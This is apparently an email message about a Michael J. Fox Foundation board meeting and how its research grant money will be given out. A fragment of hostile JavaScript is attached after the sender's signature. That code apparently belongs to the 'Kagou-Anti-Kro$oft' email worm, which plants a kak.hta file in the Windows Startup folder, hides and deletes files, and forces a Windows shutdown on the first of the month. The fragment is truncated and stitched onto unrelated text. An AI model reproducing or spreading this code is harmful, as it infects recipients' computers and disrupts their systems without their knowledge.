

Regarding proceeds from the Michael J. Fox Foundation, there is a board of directors meeting Feb. 8th & 9th in New York.  At this meeting there will be a scientific committee reviewing grant monies to .be dispirsed and to whom the grant monies will go to.  Dr. William Langston is on this commitee as well as my brother.  My brother is also a board of PAN as well as Michael J. Fox Foundation.  Please rest assured that the monies will be given to the best avaiable research.
Marv Weiss ');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();S3 driver memory alloc failed   !]]%%%%%";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu D?rrer\\Programmes\\D?rrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write(); //-->